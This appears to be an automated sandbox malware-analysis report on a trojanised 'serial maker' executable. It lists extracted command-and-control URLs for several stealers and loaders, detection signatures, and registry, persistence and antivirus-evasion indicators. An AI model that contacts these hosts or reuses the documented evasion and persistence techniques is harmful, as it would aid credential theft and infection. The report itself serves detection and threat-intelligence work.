Analysis
-
max time kernel
45s -
max time network
473s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
25/03/2021, 18:17
Static task
static1
Behavioral task
behavioral1
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral6
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Behavioral task
behavioral8
Sample
3d_Video_Player_4_5_serial_maker.exe
Resource
win10v20201028
Errors
General
-
Target
3d_Video_Player_4_5_serial_maker.exe
-
Size
5.2MB
-
MD5
a51e2c143bcc14da09cd690bd69b9fa8
-
SHA1
46424a965a43c48c521effba1e47943d1392460b
-
SHA256
b22d997f753e1bbd9756d9fcc4e45aea3cd3e52d8de4acd6c4a3140f742bac47
-
SHA512
553e72694cca748f59e3bb3c1c6e13e5d9defdf831883a250d5807cf5cf34a27350cdf38e6cd117515fee08fdd19238df0084055bb323e0ba5babd471e0bed8e
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
dfa7b4d385486b737f84d608857eb43733ffd299
-
url4cnc
https://telete.in/j9ca1pel
Extracted
icedid
petelbomber.xyz
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
smokeloader
2020
http://xsss99.icu/upload/
http://bingooodsg.icu/upload/
http://junntd.xyz/upload/
http://ginessa11.xyz/upload/
http://overplayninsx.xyz/upload/
http://bananinze.com/upload/
http://daunimlas.com/upload/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral8/memory/3520-494-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral8/memory/3520-496-0x00000000038C0000-0x000000000411D000-memory.dmp family_glupteba behavioral8/memory/3520-500-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral8/memory/6488-885-0x0000000002630000-0x000000000265D000-memory.dmp family_redline behavioral8/memory/6488-888-0x0000000002680000-0x00000000026AC000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
IcedID First Stage Loader 1 IoCs
resource yara_rule behavioral8/memory/5236-439-0x0000000000DE0000-0x0000000000DE7000-memory.dmp IcedidFirstLoader -
XMRig Miner Payload 6 IoCs
resource yara_rule behavioral8/memory/564-288-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral8/memory/564-295-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral8/memory/564-312-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral8/memory/8712-828-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral8/memory/8712-830-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral8/memory/8712-831-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
Executes dropped EXE 28 IoCs
pid Process 560 keygen-pr.exe 656 keygen-step-1.exe 976 keygen-step-3.exe 1724 keygen-step-4.exe 4432 key.exe 4472 Setup.exe 3024 multitimer.exe 4536 setups.exe 4688 askinstall20.exe 4652 setups.tmp 4388 multitimer.exe 1696 md2_2efs.exe 1728 multitimer.exe 1776 zdqitbmucpd.exe 1868 vict.exe 648 lylal220.exe 720 zdqitbmucpd.tmp 4260 vict.tmp 4608 Setup3310.exe 1180 app.exe 1096 vpn.exe 1168 olvumuzpbdl.exe 1092 IBInstaller_97039.exe 3988 Setup3310.tmp 2700 vpn.tmp 3024 IBInstaller_97039.tmp 4292 file.exe 3960 3sfqxkc4ktl.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 11 IoCs
pid Process 4652 setups.tmp 4652 setups.tmp 4652 setups.tmp 4652 setups.tmp 4652 setups.tmp 4652 setups.tmp 4652 setups.tmp 720 zdqitbmucpd.tmp 4260 vict.tmp 3988 Setup3310.tmp 3988 Setup3310.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral8/memory/4428-298-0x0000000000400000-0x0000000000EFA000-memory.dmp themida behavioral8/memory/360-300-0x0000000000400000-0x0000000000F83000-memory.dmp themida behavioral8/memory/5816-366-0x0000000000400000-0x0000000000FE1000-memory.dmp themida behavioral8/memory/2136-372-0x0000000000400000-0x0000000000FD9000-memory.dmp themida behavioral8/memory/7812-619-0x0000000000400000-0x0000000000EFA000-memory.dmp themida behavioral8/memory/6244-621-0x0000000000400000-0x0000000000F83000-memory.dmp themida behavioral8/memory/5464-625-0x0000000000400000-0x0000000000EFA000-memory.dmp themida behavioral8/memory/5276-645-0x0000000000400000-0x0000000000F83000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\qdjt0qf2s0d = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\SLMVN0XLEV\\multitimer.exe\" 1 3.1616696302.605cd3ee54a48" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 108 ipinfo.io 132 api.ipify.org 144 ip-api.com 243 checkip.amazonaws.com 542 checkip.amazonaws.com 103 ipinfo.io 142 checkip.amazonaws.com 240 ip-api.com 584 checkip.amazonaws.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 1736 4576 WerFault.exe 126 792 4676 WerFault.exe 216 5788 4420 WerFault.exe 225 4672 2056 WerFault.exe 501 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9092 schtasks.exe -
Delays execution with timeout.exe 11 IoCs
pid Process 5692 timeout.exe 2272 timeout.exe 5784 timeout.exe 3784 timeout.exe 8480 timeout.exe 212 timeout.exe 2468 timeout.exe 4036 timeout.exe 4240 timeout.exe 5424 timeout.exe 7608 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 15 IoCs
pid Process 7124 taskkill.exe 6808 taskkill.exe 6964 taskkill.exe 6972 taskkill.exe 5548 taskkill.exe 5076 taskkill.exe 1380 taskkill.exe 5160 taskkill.exe 7096 taskkill.exe 2196 taskkill.exe 2804 taskkill.exe 5620 taskkill.exe 1520 taskkill.exe 3124 taskkill.exe 7952 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 0100000021bfc370612503ea27af2a88dadef2c931ea0dc226f4d12a5652f620f0c32702f2cbd7d41ea02976785e9c90a76fbe252e57c3d8284de1c948664e776b2740c8c6c038f7965f3439b23e1632ac6d034f287d03cd857ba3c896fb61568c07d44e1b3feddcfd845474daf025b0f2f8d760edfb9e9efc9e0643cfb13d1a56851c6fc1e65b31802ea5894313f442fa30b4b5d573fed644d7cec59e28149eb9bf7e1228573bb3067d16af90463264343684438e841a81c944b8692c0151e722d76c3da6304a333d917ff4a42bcee86c2853c3e4ce5cb09206f5416ada1cdddfebdcd4c812d7239a8940967961d0de572737a9ccf1cd941c3ee0166f544916761df844619e73b5a0878fa5e387982f6e5362ec058d37235e0a6474b80f43b1898b04efe772978601aa70f6ec3f684241ccbaa030426b4cdf8b7404deab7d40e557bb6c0e300fe30d12776b4028022a4bb2456026b038c1a0e1b03b95c8e8c27da0da9cbf769b90b7de8b8496e187ed4925f7804877684c592d58597d0705b0e485298672e6462eb530b648e00c68d54745db1d1737a6b48a8d14ae4d5265645d071c431f295107bb43 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created 